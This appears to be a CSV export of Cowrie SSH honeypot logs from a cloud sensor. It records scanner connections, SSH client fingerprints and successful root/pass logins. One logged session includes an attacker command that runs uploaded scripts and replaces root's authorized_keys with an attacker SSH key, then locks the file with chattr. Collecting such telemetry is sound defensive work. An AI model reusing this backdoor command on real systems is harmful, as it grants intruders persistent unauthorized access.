+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:06:30.326 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:06:30.326160Z"",""src_ip"":""194.169.175.106"",""session"":""b6ffce5f261f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:06:30.500 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""084386fa7ae5039bcf6f07298a05a227"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519"",""ssh-rsa-cert-
v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:06:30.498544Z"",""src_ip"":""194.169.175.106"",""session"":""b6ffce5f261f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:06:32.589 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":2.3016562461853027,""message"":""Connection lost after 2 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:06:32.588946Z"",""src_ip"":""194.169.175.106"",""session"":""b6ffce5f261f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:42:19.824 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""147.135.23.106"",""src_port"":47755,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""00cb0117e314"",""protocol"":""ssh"",""message"":""New connection: 147.135.23.106:47755 (10.0.0.4:2222) [session: 00cb0117e314]"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:42:19.823435Z""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:42:30.921 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":11.096426010131836,""message"":""Connection lost after 11 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:42:30.921168Z"",""src_ip"":""147.135.23.106"",""session"":""00cb0117e314""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:02:51.211 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""198.235.24.6"",""src_port"":58364,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""ecb546af3451"",""protocol"":""ssh"",""message"":""New connection: 198.235.24.6:58364 (10.0.0.4:2222) [session: ecb546af3451]"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:02:51.210064Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:02:52.257 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:02:52.256303Z"",""src_ip"":""198.235.24.6"",""session"":""ecb546af3451""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:02:53.780 
AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hma
c-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:02:53.777554Z"",""src_ip"":""198.235.24.6"",""session"":""ecb546af3451""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:02:57.150 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":5.937931537628174,""message"":""Connection lost after 5 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:02:57.149297Z"",""src_ip"":""198.235.24.6"",""session"":""ecb546af3451""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:23:56.122 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""38.88.252.187"",""src_port"":40435,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""19639ea22419"",""protocol"":""ssh"",""message"":""New connection: 38.88.252.187:40435 (10.0.0.4:2222) [session: 19639ea22419]"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:23:56.121602Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 1:23:56.196 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.0722343921661377,""message"":""Connection lost after 0 
seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T01:23:56.195313Z"",""src_ip"":""38.88.252.187"",""session"":""19639ea22419""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 2:07:50.039 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""167.172.151.86"",""src_port"":44034,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""ebe0c0bc3bf2"",""protocol"":""ssh"",""message"":""New connection: 167.172.151.86:44034 (10.0.0.4:2222) [session: ebe0c0bc3bf2]"",""sensor"":""server01"",""timestamp"":""2024-09-21T02:07:50.037947Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 2:07:50.047 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh-0.1"",""message"":""Remote SSH version: SSH-2.0-libssh-0.1"",""sensor"":""server01"",""timestamp"":""2024-09-21T02:07:50.046938Z"",""src_ip"":""167.172.151.86"",""session"":""ebe0c0bc3bf2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 2:07:50.057 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.017077922821044922,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T02:07:50.056329Z"",""src_ip"":""167.172.151.86"",""session"":""ebe0c0bc3bf2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:21:21.616 
AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""147.185.132.204"",""src_port"":55262,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""aaa36b27802b"",""protocol"":""ssh"",""message"":""New connection: 147.185.132.204:55262 (10.0.0.4:2222) [session: aaa36b27802b]"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:21:21.614549Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 4:21:21.775 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.15813398361206055,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T04:21:21.774450Z"",""src_ip"":""147.185.132.204"",""session"":""aaa36b27802b""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:22.793 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""128.199.225.7"",""src_port"":44786,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""8fe108a89762"",""protocol"":""ssh"",""message"":""New connection: 128.199.225.7:44786 (10.0.0.4:2222) [session: 8fe108a89762]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:22.789365Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:22.793 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh2_1.11.0"",""message"":""Remote SSH version: SSH-2.0-libssh2_1.11.0"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:22.792106Z"",""src_ip"":""128.199.225.7"",""session"":""8fe108a89762""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:23.053 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""5741d3852f927da511861c6662f84439"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group16-sha512"",""diffie-hellman-group18-sha512"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""diffie-hellman-group-exchange-sha1"",""ext-info-c""],""keyAlgs"":[""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519"",""ssh-ed25519-cert-v01@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss""],""encCS"":[""aes256-gcm@openssh.com"",""aes128-gcm@openssh.com"",""aes256-ctr"",""aes192-ctr"",""aes128-ctr"",""aes256-cbc"",""rijndael-cbc@lysator.liu.se"",""aes192-cbc"",""aes128-cbc"",""arcfour128"",""arcfour"",""3des-cbc""],""macCS"":[""hmac
-sha2-256"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha1"",""hmac-sha1-etm@openssh.com"",""hmac-sha1-96"",""hmac-md5"",""hmac-md5-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 5741d3852f927da511861c6662f84439"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:23.050366Z"",""src_ip"":""128.199.225.7"",""session"":""8fe108a89762""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.139 AM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""pass"",""message"":""login attempt [root/pass] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.136800Z"",""src_ip"":""128.199.225.7"",""session"":""8fe108a89762""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.386 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":1.592932939529419,""message"":""Connection lost after 1 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.384887Z"",""src_ip"":""128.199.225.7"",""session"":""8fe108a89762""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.484 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""5.182.211.148"",""src_port"":57380,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""de6aa0229f39"",""protocol"":""ssh"",""message"":""New connection: 5.182.211.148:57380 (10.0.0.4:2222) [session: de6aa0229f39]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.481345Z""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.484 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.482864Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.567 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""5f904648ee8964bef0e8834012e26003"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""h
mac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 5f904648ee8964bef0e8834012e26003"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.565121Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:24.816 AM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""pass"",""message"":""login attempt [root/pass] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:24.815629Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.852 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.850594Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.853 AM",,"{""eventid"":""cowrie.command.input"",""input"":""chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \""ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\"" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \""\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"""",""message"":""CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \""ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\"" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \""\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"""",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.852451Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.945 AM",,"{""eventid"":""cowrie.session.file_download"",""duplicate"":false,""outfile"":""var/lib/cowrie/downloads/8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b"",""shasum"":""8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b"",""destfile"":""/root/.ssh/authorized_keys"",""message"":""Saved redir contents with SHA-256 8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b to 
var/lib/cowrie/downloads/8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.941899Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.947 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6"",""size"":200,""shasum"":""4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6"",""duplicate"":false,""duration"":0.0936119556427002,""message"":""Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.943478Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:40.955 AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""clean.sh"",""outfile"":""var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e"",""shasum"":""d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e"",""message"":""SFTP Uploaded file \""clean.sh\"" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.948358Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" 